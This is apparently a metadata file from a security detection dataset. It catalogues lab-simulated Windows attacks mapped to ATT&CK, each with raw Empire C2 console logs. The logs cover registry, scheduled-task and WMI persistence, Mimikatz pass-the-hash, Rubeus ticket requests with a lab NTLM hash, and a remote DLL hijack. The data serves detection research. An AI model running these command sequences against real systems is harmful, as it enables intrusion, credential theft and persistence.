ADSPath          False                                 Alternate-data-stream location to store \n                                                        the script code.                        \n  EventLogID       False                                 Store the script in the Application     \n                                                        event log under the specified EventID.  \n                                                        The ID needs to be unique/rare!         \n  ExtFile          False                                 Use an external file for the payload    \n                                                        instead of a stager.                    \n  Cleanup          False                                 Switch. Cleanup the trigger and any     \n                                                        script from specified location.         \n  UserAgent        False       default                   User-agent string to use for the staging\n                                                        request (default, none, or other).      \n  Proxy            False       default                   Proxy to use for request (default, none,\n                                                        or other).                              \n  ProxyCreds       False       default                   Proxy credentials                       \n                                                        ([domain\\]username:password) to use for \n                                                        request (default, none, or other).      \n\n(Empire: powershell/persistence/userland/registry) > set Listener http\n(Empire: powershell/persistence/userland/registry) > execute\n[>] Module is not opsec safe, run? [y/N] y\n[*] Tasked KU86XWEL to run TASK_CMD_WAIT\n[*] Agent KU86XWEL tasked with task ID 1\n[*] Tasked agent KU86XWEL to run module powershell/persistence/userland/registry\n(Empire: powershell/persistence/userland/registry) > \nRegistry persistence established using listener http stored in HKCU:Software\\Microsoft\\Windows\\CurrentVersion\\Debug.\n\n(Empire: powershell/persistence/userland/registry) > \n(Empire: powershell/persistence/userland/registry) > \n[*] Sending POWERSHELL stager (stage 1) to 172.18.39.5\n[*] New agent SP7B3U2X checked in\n[+] Initial agent SP7B3U2X from 172.18.39.5 now active (Slack)\n[*] Sending agent (stage 2) to SP7B3U2X at 172.18.39.5\n\n(Empire: powershell/persistence/userland/registry) > agents\n\n[*] Active agents:\n\nName     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener\n----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------\nKU86XWEL ps 172.18.39.5     WORKSTATION5      THESHIRE\\pgustavo       powershell         5376   5/0.0    2020-09-04 07:07:17  http            \nSP7B3U2X ps 172.18.39.5     WORKSTATION5      THESHIRE\\pgustavo       powershell         1376   5/0.0    2020-09-04 07:09:04  http            \n\n(Empire: agents) > interact SP7B3U2X\n(Empire: SP7B3U2X) > shell whoami\n[*] Tasked SP7B3U2X to run TASK_SHELL\n[*] Agent SP7B3U2X tasked with task ID 1\n(Empire: SP7B3U2X) > \ntheshire\\pgustavo\n..Command execution completed.\n\n    (Empire: SP7B3U2X) >"}, "references": null}, "SDWIN-190319024742": {"title": "Empire Userland Scheduled Tasks", "id": "SDWIN-190319024742", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2019/03/19", "modification_date": "2020/09/20", "platform": ["Windows"], "type": "atomic", "tags": ["Local Scheduled Tasks"], "description": "This dataset represents adversaries creating and/or executing local scheduled tasks to maintain persistence in an environment.", "attack_mappings": [{"technique": "T1053", "sub-technique": "005", "tactics": ["TA0003"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/persistence/host/empire_schtasks_creation_standard_user.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Empire", "module": "schtasks", "script": "https://github.com/EmpireProject/Empire/blob/dev/data/module_source/persistence/Persistence.psm1"}], "permissions_required": ["User"], "adversary_view": "(Empire: stager/multi/launcher) > agents\n\n[*] Active agents:\n\nName     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener\n----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------\nA7BWPR32 ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         5904   5/0.0    2020-09-18 18:29:36  http            \nHBEW9G1D ps 172.18.39.6     WORKSTATION6      THESHIRE\\sbeavers       powershell         6036   5/0.0    2020-09-18 18:15:39  http            \nUF5MYK42 ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         6404   5/0.0    2020-09-20 21:28:07  http            \n\n3MWPS8L6 ps 172.18.39.5     WORKSTATION5      THESHIRE\\pgustavo       powershell         7312   5/0.0    2020-09-21 07:12:36  http            \n\n(Empire: agents) > interact 3MWPS8L6         \n(Empire: 3MWPS8L6) > usemodule persistence/userland/schtasks\n(Empire: powershell/persistence/userland/schtasks) > info\n\n              Name: Invoke-Schtasks\n            Module: powershell/persistence/userland/schtasks\n        NeedsAdmin: False\n        OpsecSafe: False\n          Language: powershell\nMinLanguageVersion: 2\n        Background: False\n  OutputExtension: None\n\nAuthors:\n  @mattifestation\n  @harmj0y\n\nDescription:\n  Persist a stager (or script) using schtasks. This has a\n  moderate detection/removal rating.\n\nComments:\n  https://github.com/mattifestation/PowerSploit/blob/master/Pe\n  rsistence/Persistence.psm1\n\nOptions:\n\n  Name             Required    Value                     Description\n  ----             --------    -------                   -----------\n  Agent            True        3MWPS8L6                  Agent to run module on.                 \n  Listener         False                                 Listener to use.                        \n  Obfuscate        False       False                     Switch. Obfuscate the launcher          \n                                                        powershell code, uses the               \n                                                        ObfuscateCommand for obfuscation types. \n                                                        For powershell only.                    \n  ObfuscateCommand False       Token\\All\\1               The Invoke-Obfuscation command to use.  \n                                                        Only used if Obfuscate switch is True.  \n                                                        For powershell only.                    \n  AMSIBypass       False       True                      Include mattifestation's AMSI Bypass in \n                                                        the stager code.                        \n  AMSIBypass2      False       False                     Include Tal Liberman's AMSI Bypass in   \n                                                        the stager code.                        \n  DailyTime        False       09:00                     Daily time to trigger the script        \n                                                        (HH:mm).                                \n  IdleTime         False                                 User idle time (in minutes) to trigger  \n                                                        script.                                 \n  TaskName         True        Updater                   Name to use for the schtask.            \n  RegPath          False       HKCU:\\Software\\Microsoft  Registry location to store the script   \n                              \\Windows\\CurrentVersion\\  code. Last element is the key name.     \n                              debug                   \n  ADSPath          False                                 Alternate-data-stream location to store \n                                                        the script code.                        \n  ExtFile          False                                 Use an external file for the payload    \n                                                        instead of a stager.                    \n  Cleanup          False                                 Switch. Cleanup the trigger and any     \n                                                        script from specified location.         \n  UserAgent        False       default                   User-agent string to use for the staging\n                                                        request (default, none, or other).      \n  Proxy            False       default                   Proxy to use for request (default, none,\n                                                        or other).                              \n  ProxyCreds       False       default                   Proxy credentials                       \n                                                        ([domain\\]username:password) to use for \n                                                        request (default, none, or other).      \n\n(Empire: powershell/persistence/userland/schtasks) > set Listener http\n(Empire: powershell/persistence/userland/schtasks) > set TaskName MordorSchtask\n(Empire: powershell/persistence/userland/schtasks) > execute\n[>] Module is not opsec safe, run? [y/N] y\n[*] Tasked 3MWPS8L6 to run TASK_CMD_WAIT\n[*] Agent 3MWPS8L6 tasked with task ID 1\n[*] Tasked agent 3MWPS8L6 to run module powershell/persistence/userland/schtasks\n(Empire: powershell/persistence/userland/schtasks) > \nSUCCESS: The scheduled task \"MordorSchtask\" has successfully been created.\nSchtasks persistence established using listener http stored in HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\debug with MordorSchtask daily trigger at 09:00."}, "references": null}, "SDWIN-190319131123": {"title": "Empire Over-Pass-The-Hash", "id": "SDWIN-190319131123", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2019/03/19", "modification_date": "2020/09/20", "platform": ["Windows"], "type": "atomic", "tags": ["Over-Pass-The-Hash", "Patching LSASS"], "description": "This dataset represents adversaries taking a hash/key (rc4_hmac, aes256_cts_hmac_sha1, etc.) for a domain-joined user into a fully-fledged Kerberos TGT. In this case, an adversary can write the hash/key into an existing logon session (i.e. a sacrificial logon session) section in the memory content of LSASS and kick off the regular Kerberos authentication process.", "attack_mappings": [{"technique": "T1550", "sub-technique": "002", "tactics": ["TA0005", "TA0008"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/host/empire_over_pth_patch_lsass.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Empire", "module": "mimikataz_pth", "script": "https://github.com/OTRF/Blacksmith/blob/master/aws/Security-Datasets/cfn-files/scripts/Invoke-Mimikatz.ps1"}], "permissions_required": ["Administrator"], "adversary_view": "(Empire: stager/multi/launcher) > agents\n\n[*] Active agents:\n\nName     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener\n----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------\n4EH9PC5S ps 172.18.39.6     WORKSTATION6      *THESHIRE\\wardog        powershell         5056   5/0.0    2020-09-22 02:12:12  http            \n\n(Empire: agents) > interact 4EH9PC5S\n(Empire: 4EH9PC5S) > \n(Empire: 4EH9PC5S) > usemodule credentials/mimikatz/pth*\n(Empire: powershell/credentials/mimikatz/pth) > info\n\n              Name: Invoke-Mimikatz PTH\n            Module: powershell/credentials/mimikatz/pth\n        NeedsAdmin: True\n        OpsecSafe: True\n          Language: powershell\nMinLanguageVersion: 2\n        Background: True\n  OutputExtension: None\n\nAuthors:\n  @JosephBialek\n  @gentilkiwi\n\nDescription:\n  Runs PowerSploit's Invoke-Mimikatz function to execute\n  sekurlsa::pth to create a new process. with a specific\n  user's hash. Use credentials/tokens to steal the token\n  afterwards.\n\nComments:\n  http://clymb3r.wordpress.com/ http://blog.gentilkiwi.com\n  http://blog.cobaltstrike.com/2015/05/21/how-to-pass-the-\n  hash-with-mimikatz/\n\nOptions:\n\n  Name   Required    Value                     Description\n  ----   --------    -------                   -----------\n  Agent  True        4EH9PC5S                  Agent to run module on.                 \n  CredID False                                 CredID from the store to use for ticket \n                                              creation.                               \n  user   False                                 Username to impersonate.                \n  domain False                                 The fully qualified domain name.        \n  ntlm   False                                 The NTLM hash to use.                   \n\n(Empire: powershell/credentials/mimikatz/pth) > set ntlm 81d310fa34e6a56a31145445891bb7b8\n(Empire: powershell/credentials/mimikatz/pth) > set user pgustavo\n(Empire: powershell/credentials/mimikatz/pth) > set domain theshire.local\n(Empire: powershell/credentials/mimikatz/pth) > execute\n[*] Tasked 4EH9PC5S to run TASK_CMD_JOB\n[*] Agent 4EH9PC5S tasked with task ID 1\n[*] Tasked agent 4EH9PC5S to run module powershell/credentials/mimikatz/pth\n(Empire: powershell/credentials/mimikatz/pth) > \nJob started: 1WCLFA\n\nHostname: WORKSTATION6.theshire.local / S-1-5-21-4228717743-1032521047-1810997296\n\n  .#####.   mimikatz 2.2.0 (x64) #19041 Aug 10 2020 20:07:46\n.## ^ ##.  \"A La Vie, A L'Amour\" - (oe.eo)\n## / \\ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )\n## \\ / ##       > http://blog.gentilkiwi.com/mimikatz\n'## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )\n  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/\n\nmimikatz(powershell) # sekurlsa::pth /user:pgustavo /domain:theshire.local /ntlm:81d310fa34e6a56a31145445891bb7b8\nuser    : pgustavo\ndomain  : theshire.local\nprogram : cmd.exe\nimpers. : no\nNTLM    : 81d310fa34e6a56a31145445891bb7b8\n  |  PID  3148\n  |  TID  6488\n  |  LSA Process is now R/W\n  |  LUID 0 ; 69262895 (00000000:0420de2f)\n  \\_ msv1_0   - data copy @ 000001C7E0166C80 : OK !\n  \\_ kerberos - data copy @ 000001C7E02B1268\n  \\_ aes256_hmac       -> null             \n  \\_ aes128_hmac       -> null             \n  \\_ rc4_hmac_nt       OK\n  \\_ rc4_hmac_old      OK\n  \\_ rc4_md4           OK\n  \\_ rc4_hmac_nt_exp   OK\n  \\_ rc4_hmac_old_exp  OK\n  \\_ *Password replace @ 000001C7E01AEDE8 (32) -> null\n\nUse credentials/token to steal the token of the created PID."}, "references": ["https://github.com/GhostPack/Rubeus#example-over-pass-the-hash", "https://github.com/gentilkiwi/mimikatz/blob/a0f243b33590751a77b6d6f275313a4fe8d42c82/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_kerberos.c#L566-L600"]}, "SDWIN-190319145126": {"title": "Rubeus Userland ASKTGT PTT", "id": "SDWIN-190319145126", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2019/03/19", "modification_date": "2020/09/21", "platform": ["Windows"], "type": "atomic", "tags": ["Over-Pass-The-Hash", "Not Touching LSASS"], "description": "This dataset represents adversaries crafting raw AS-REQ (TGT request) traffic for a specific user and encryption key (/rc4, /aes128, /aes256, or /des) to request TGTs without touching lsass.", "attack_mappings": [{"technique": "T1003", "sub-technique": "003", "tactics": ["TA0006"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/host/empire_shell_rubeus_asktgt_ptt.zip"}, {"type": "Network", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/network/empire_shell_rubeus_asktgt_ptt.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Empire", "module": "shell", "script": null}, {"type": "binary", "name": "Rubeus", "module": "asktgt", "script": "https://github.com/GhostPack/Rubeus"}], "permissions_required": ["User"], "adversary_view": "(Empire: stager/multi/launcher) > agents\n\n[*] Active agents:\n\nName     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener\n----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------\n4EH9PC5S ps 172.18.39.6     WORKSTATION6      *THESHIRE\\wardog        powershell         5056   5/0.0    2020-09-22 02:12:12  http            \n\n(Empire: agents) > interact 4EH9PC5S\n(Empire: 4EH9PC5S) > \n(Empire: 4EH9PC5S) > shell C:\\users\\sbeavers\\Desktop\\Rubeus.exe asktgt /user:pgustavo /rc4:81d310fa34e6a56a31145445891bb7b8 /ptt\n[*] Tasked 4EH9PC5S to run TASK_SHELL\n[*] Agent 4EH9PC5S tasked with task ID 2\n(Empire: 4EH9PC5S) > \n______        _                      \n  (_____ \\      | |                     \n  _____) )_   _| |__  _____ _   _  ___ \n  |  __  /| | | |  _ \\| ___ | | | |/___)\n  | |  \\ \\| |_| | |_) ) ____| |_| |___ |\n  |_|   |_|____/|____/|_____)____/(___/\n\n  v1.5.0 \n\n[*] Action: Ask TGT\n\n[*] Using rc4_hmac hash: 81d310fa34e6a56a31145445891bb7b8\n[*] Building AS-REQ (w/ preauth) for: 'theshire.local\\pgustavo'\n[+] TGT request successful!\n[*] base64(ticket.kirbi):\n\n      doIFPjCCBTqgAwIBBaEDAgEWooIETTCCBElhggRFMIIEQaADAgEFoRAbDlRIRVNISVJFLkxPQ0FMoiMw\n      IaADAgECoRowGBsGa3JidGd0Gw50aGVzaGlyZS5sb2NhbKOCBAEwggP9oAMCARKhAwIBAqKCA+8EggPr\n      SCmXhrxOqig5LjU/zlOxxj72iV0Io1vDNrnEHqq0hTNheiEb2Oz3yOEk3Ct6qioIJmjm/PE+MoazpfNa\n      DOQUkxLNyEti0ltIyI2I2docI0yIbXA8BNRrGojFdruBcOs5NdDfi2Ttsng+NcZzWmCH4D3amx7AjOMr\n      jRotAieTg98Uzt3AG03bQSlPNkLJCW/Pnz5YCE8I8zIrkkGH+mTA+mGg4cNeVJE38nOlShq0meRMKKxC\n      drFfzsCgJ64r9dVBP+LmegRcUbrPLv6d2UHc+k0ELbhhfHgiy5m06UaLfrAe8fiUcHsdN0cJ1+4f9KCL\n      NsbjXJN85QQGzdOFFjJ07hir+SZ1UU+0NSaOkbFHz178KMk2P/9yWT9UqTEHV2qXuHS4scCV5SQirH6b\n      HAWlEpqeEwh+yGUmhLGs8Jo9sBsNEQ6EdFUzA+JjD4itQa4IMgLSLNEwzkZOle85Jbw4kDFsFmtckKVu\n      1osdI7dxA9wM/dZElOVUiI2cYqbI+pOcyPJHuzhbYnVhUhKFi29ZxPe1an0T7tNoy1zCFSs0z3V5RKwZ\n      4eUVQVxYGspUbB4h21/zEbus+NGTzWtJMqb6L4abOj1iLiRgJagyFKk5h91fasaRUoVAo3VxiIbrPqfh\n      kH393T/SC9ZObPESkBY8FVvhs/kuqRZIIhflbdYsTdcp0sa/F7Mo90CREIhH3EqgIQ/e97eK1Z9fr3Ma\n      HGfFBEEYcHIm28FQU3gtyMFTSp9gswbq3YtsOMGF5oLY8Po6vAdhHV2wStV9FDPVPepT4USsZGYZ567p\n      40PiSGBRUmCevWqrIA5kNwKD8QvaefXrGLZ+oXes9dt3CqHENQ4pJN67gUZq/F5tfFWYwDkefjNWMOwY\n      lIAEvyxrxlnA8ouBkvkLSkz4jYMjUCstdJ7TiF/GMboXAX1kfQpv01sMV/39RdSaE4s6aTGlqX2vDShM\n      OSdwfSS4qTU8kTkWuKgUh/Fcs2jYbjKfDvOqfkY5fAf+JSPRwqBC4mhsoGDLd3XGFba7prlV0VopSymj\n      //ZpVE70a2VJazJHuHoS1ZWvNVILQwF0FteGc5UYQHPMlAC7v6Qr360g8mHv9PG6AS7dHb3WWnezaRV7\n      ByPSxZ2B/WHEYWROuXlAK+dKWKWU31/NK6rX8l4Re8OUeu4/lGoEwZikKWxs+jE1zSOww46iZA78zJ3u\n      QVeK8t90Z28pxwRX8mo2/PfnOEFwVJMsrBSiwLrLFDbjGqCX8ktaZ1ZTxcXLYu8mfDvCs9KAUMRvncBH\n      g5yHUuoX6dIAY6EhWmpeSmqwV5VCV1kUarhKJt+JTC3Yjg9FaPGkJlJae6OB3DCB2aADAgEAooHRBIHO\n      fYHLMIHIoIHFMIHCMIG/oBswGaADAgEXoRIEEGTttXVs0y3nHHWU3quEoDChEBsOVEhFU0hJUkUuTE9D\n      QUyiFTAToAMCAQGhDDAKGwhwZ3VzdGF2b6MHAwUAQOEAAKURGA8yMDIwMDkyMjAyMzkxM1qmERgPMjAy\n      MDA5MjIxMjM5MTNapxEYDzIwMjAwOTI5MDIzOTEzWqgQGw5USEVTSElSRS5MT0NBTKkjMCGgAwIBAqEa\n      MBgbBmtyYnRndBsOdGhlc2hpcmUubG9jYWw=\n[+] Ticket successfully imported!\n\n  ServiceName           :  krbtgt/theshire.local\n  ServiceRealm          :  THESHIRE.LOCAL\n  UserName              :  pgustavo\n  UserRealm             :  THESHIRE.LOCAL\n  StartTime             :  9/21/2020 10:39:13 PM\n  EndTime               :  9/22/2020 8:39:13 AM\n  RenewTill             :  9/28/2020 10:39:13 PM\n  Flags                 :  name_canonicalize, pre_authent, initial, renewable, forwardable\n  KeyType               :  rc4_hmac\n  Base64(key)           :  ZO21dWzTLeccdZTeq4SgMA==\n\n..Command execution completed.\n\n(Empire: 4EH9PC5S) >"}, "references": ["https://github.com/GhostPack/Rubeus#example-over-pass-the-hash"]}, "SDWIN-190403133337": {"title": "IKEEXT Remote Service DLL Hijack", "id": "SDWIN-190403133337", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2019/04/03", "modification_date": "2020/09/20", "platform": ["Windows"], "type": "atomic", "tags": ["Remote Service DLL Hijacking", "RPC over SMB Svcctl"], "description": "This dataset represents adversaries copying a file remotely to replace a file which is executed by a service that is vulnerable to DLL hijack. This dataset includes", "attack_mappings": [{"technique": "T1574", "sub-technique": "001", "tactics": ["TA0003", "TA0004", "TA0005"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/empire_shell_dcerpc_smb_service_dll_hijack.zip"}, {"type": "Network", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/network/empire_shell_dcerpc_smb_service_dll_hijack.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Empire", "module": "manual", "script": null}], "permissions_required": ["Administrator"], "adversary_view": "(Empire: agents) > usestager windows/dll\n(Empire: stager/windows/dll) > info\nName: DLL Launcher\n\nDescription:\n  Generate a PowerPick Reflective DLL to inject with\n  stager code.\n\nOptions:\n\n  Name             Required    Value             Description\n  ----             --------    -------           -----------\n  Listener         True        http              Listener to use.\n  Language         True        powershell        Language of the stager to generate.\n  Arch             True        x64               Architecture of the .dll to generate\n                                                (x64 or x86).\n  StagerRetries    False       0                 Times for the stager to retry\n                                                connecting.\n  UserAgent        False       default           User-agent string to use for the staging\n                                                request (default, none, or other).\n  Proxy            False       default           Proxy to use for request (default, none,\n                                                or other).\n  ProxyCreds       False       default           Proxy credentials\n                                                ([domain\\]username:password) to use for\n                                                request (default, none, or other).\n  OutFile          True        /tmp/wlbsctrl.dll File to output dll to.\n  Obfuscate        False       False             Switch. Obfuscate the launcher\n                                                powershell code, uses the\n                                                ObfuscateCommand for obfuscation types.\n                                                For powershell only.\n  ObfuscateCommand False       Token\\All\\1       The Invoke-Obfuscation command to use.\n                                                Only used if Obfuscate switch is True.\n                                                For powershell only.\n  AMSIBypass       False       True              Include mattifestation's AMSI Bypass in\n                                                the stager code.\n  AMSIBypass2      False       False             Include Tal Liberman's AMSI Bypass in\n                                                the stager code.\n  ScriptLogBypass  False       True              Include cobbr's Script Block Log Bypass\n                                                in the stager code.\n  ETWBypass        False       False             Include tandasat's ETW bypass in the\n                                                stager code.\n\n(Empire: stager/windows/dll) > back\n(Empire: agents) > agents\n\n[*] Active agents:\n\n  Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener\n  ----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------\n  GCSKD17Z ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         1112   5/0.0    2020-09-22 03:51:02  http            \n\n(Empire: agents) > interact GCSKD17Z\n(Empire: GCSKD17Z) >\n(Empire: GCSKD17Z) > upload /tmp/wlbsctrl.dll\n[*] Tasked agent to upload wlbsctrl.dll, 124 KB\n(Empire: GCSKD17Z) > shell COPY .\\wlbsctrl.dll \\\\WORKSTATION6\\C$\\Windows\\System32\\wlbsctrl.dll\n[*] Tasked GCSKD17Z to run TASK_SHELL\n[*] Agent GCSKD17Z tasked with task ID 3\n(Empire: GCSKD17Z) > \n..Command execution completed.\n\n(Empire: GCSKD17Z) > shell sc.exe `\\`\\WORKSTATION6 stop IKEEXT\n[*] Tasked GCSKD17Z to run TASK_SHELL\n[*] Agent GCSKD17Z tasked with task ID 4\n(Empire: GCSKD17Z) > \nSERVICE_NAME: IKEEXT \n        TYPE               : 30  WIN32  \n        STATE              : 3  STOP_PENDING \n                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)\n        WIN32_EXIT_CODE    : 0  (0x0)\n        SERVICE_EXIT_CODE  : 0  (0x0)\n        CHECKPOINT         : 0x0\n        WAIT_HINT          : 0x1388\n\n..Command execution completed.\n\n(Empire: GCSKD17Z) > shell sc.exe `\\`\\WORKSTATION6 query IKEEXT\n[*] Tasked GCSKD17Z to run TASK_SHELL\n[*] Agent GCSKD17Z tasked with task ID 5\n(Empire: GCSKD17Z) > \nSERVICE_NAME: IKEEXT \n        TYPE               : 20  WIN32_SHARE_PROCESS  \n        STATE              : 1  STOPPED \n        WIN32_EXIT_CODE    : 0  (0x0)\n        SERVICE_EXIT_CODE  : 0  (0x0)\n        CHECKPOINT         : 0x0\n        WAIT_HINT          : 0x0\n\n..Command execution completed.\n\n(Empire: GCSKD17Z) > shell sc.exe `\\`\\WORKSTATION6 start IKEEXT\n[*] Tasked GCSKD17Z to run TASK_SHELL\n[*] Agent GCSKD17Z tasked with task ID 6\n(Empire: GCSKD17Z) > \nSERVICE_NAME: IKEEXT \n        TYPE               : 30  WIN32  \n        STATE              : 2  START_PENDING \n                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)\n        WIN32_EXIT_CODE    : 0  (0x0)\n        SERVICE_EXIT_CODE  : 0  (0x0)\n        CHECKPOINT         : 0x0\n        WAIT_HINT          : 0x7d0\n        PID                : 6172\n        FLAGS              : \n\n..Command execution completed.\n\n(Empire: GCSKD17Z) >"}, "references": ["https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992"]}, "SDWIN-190518182022": {"title": "Empire VBS Execution", "id": "SDWIN-190518182022", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2019/05/18", "modification_date": "2020/09/20", "platform": ["Windows"], "type": "atomic", "tags": ["VBS Script Execution"], "description": "This dataset represents adversaries executing a VBS script as a launcher for initial access.", "attack_mappings": [{"technique": "T1059", "sub-technique": "005", "tactics": ["TA0002"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/execution/host/empire_launcher_vbs.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Empire", "module": "launcher", "script": "https://github.com/BC-SECURITY/Empire/blob/master/lib/stagers/windows/launcher_vbs.py"}], "permissions_required": ["User"], "adversary_view": "(Empire: listeners) > usestager windows/launcher_vbs\n(Empire: stager/windows/launcher_vbs) > info\n\nName: VBS Launcher\n\nDescription:\n  Generates a .vbs launcher for Empire.\n\nOptions:\n\n  Name             Required    Value             Description\n  ----             --------    -------           -----------\n  Listener         True                          Listener to generate stager for.\n  Language         True        powershell        Language of the stager to generate.\n  StagerRetries    False       0                 Times for the stager to retry\n                                                connecting.\n  OutFile          False       /tmp/launcher.vbs File to output .vbs launcher to,\n                                                otherwise displayed on the screen.\n  Obfuscate        False       False             Switch. Obfuscate the launcher\n                                                powershell code, uses the\n                                                ObfuscateCommand for obfuscation types.\n                                                For powershell only.\n  ObfuscateCommand False       Token\\All\\1       The Invoke-Obfuscation command to use.\n                                                Only used if Obfuscate switch is True.\n                                                For powershell only.\n  UserAgent        False       default           User-agent string to use for the staging\n                                                request (default, none, or other).\n  Proxy            False       default           Proxy to use for request (default, none,\n                                                or other).\n  ProxyCreds       False       default           Proxy credentials\n                                                ([domain\\]username:password) to use for\n                                                request (default, none, or other).\n\n\n(Empire: stager/windows/launcher_vbs) > set Listener http\n(Empire: stager/windows/launcher_vbs) > execute\n\n[*] Stager output written out to: /tmp/launcher.vbs\n\n(Empire: stager/windows/launcher_vbs) > \n[*] Sending POWERSHELL stager (stage 1) to 172.18.39.5\n[*] New agent K47LRAEP checked in\n[+] Initial agent K47LRAEP from 172.18.39.5 now active (Slack)\n[*] Sending agent (stage 2) to K47LRAEP at 172.18.39.5\n\n(Empire: stager/windows/launcher_vbs) > agents\n\n[*] Active agents:\n\nName     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener\n----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------\nK47LRAEP ps 172.18.39.5     WORKSTATION5      THESHIRE\\pgustavo       powershell         2316   5/0.0    2020-09-04 20:10:07  http            \n\n(Empire: agents) > interact K47LRAEP\n(Empire: K47LRAEP) > \n(Empire: K47LRAEP) > shell whoami\n[*] Tasked K47LRAEP to run TASK_SHELL\n[*] Agent K47LRAEP tasked with task ID 1\n(Empire: K47LRAEP) > \ntheshire\\pgustavo\n..Command execution completed.\n\n(Empire: K47LRAEP) > \n(Empire: K47LRAEP) > "}, "references": null}, "SDWIN-190518184306": {"title": "Empire Elevated WMI Eventing", "id": "SDWIN-190518184306", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2019/05/18", "modification_date": "2020/09/20", "platform": ["Windows"], "type": "atomic", "tags": ["Local WMI Eventing", "WMI Event Subscriptions"], "description": "This dataset represents adversaries leveraging WMI subscriptions locally for persistence.", "attack_mappings": [{"technique": "T1546", "sub-technique": "003", "tactics": ["TA0003", "TA0004"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/persistence/host/empire_wmi_local_event_subscriptions_elevated_user.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Empire", "module": "wmi", "script": "https://github.com/EmpireProject/Empire/blob/dev/data/module_source/persistence/Persistence.psm1"}], "permissions_required": ["Administrator"], "adversary_view": "(Empire: powershell/privesc/bypassuac_fodhelper) > agents\n[*] Active agents:\n\nName     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener\n----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------\n28BNF7RH ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         5392   5/0.0    2020-09-04 20:31:17  http            \nW2TBCPHU ps 172.18.39.5     WORKSTATION5      THESHIRE\\pgustavo       powershell         5584   5/0.0    2020-09-04 20:42:01  http            \n13ZK6G7M ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         5676   5/0.0    2020-09-04 20:41:59  http            \n\n(Empire: agents) > interact 13ZK6G7M\n(Empire: 13ZK6G7M) > \n(Empire: 13ZK6G7M) > usemodule persistence/elevated/wmi*\n(Empire: powershell/persistence/elevated/wmi) > info\n\n              Name: Invoke-WMI\n            Module: powershell/persistence/elevated/wmi\n        NeedsAdmin: True\n        OpsecSafe: False\n          Language: powershell\nMinLanguageVersion: 2\n        Background: False\n  OutputExtension: None\n\nAuthors:\n  @mattifestation\n  @harmj0y\n  @jbooz1\n\nDescription:\n  Persist a stager (or script) using a permanent WMI\n  subscription. This has a difficult detection/removal rating.\n\nComments:\n  https://github.com/mattifestation/PowerSploit/blob/master/Pe\n  rsistence/Persistence.psm1\n\nOptions:\n\n  Name        Required    Value                     Description\n  ----        --------    -------                   -----------\n  Agent       True        13ZK6G7M                  Agent to run module on.                 \n  Listener    True        http                      Listener to use.                        \n  DailyTime   False                                 Daily time to trigger the script        \n                                                    (HH:mm).                                \n  AtStartup   False       True                      Switch. Trigger script (within 5        \n                                                    minutes) of system startup.             \n  FailedLogon False                                 Trigger script with a failed logon      \n                                                    attempt from a specified user           \n  SubName     True        Updater                   Name to use for the event subscription. \n  ExtFile     False                                 Use an external file for the payload    \n                                                    instead of a stager.                    \n  Cleanup     False                                 Switch. Cleanup the trigger and any     \n                                                    script from specified location.         \n  UserAgent   False       default                   User-agent string to use for the staging\n                                                    request (default, none, or other).      \n  Proxy       False       default                   Proxy to use for request (default, none,\n                                                    or other).                              \n  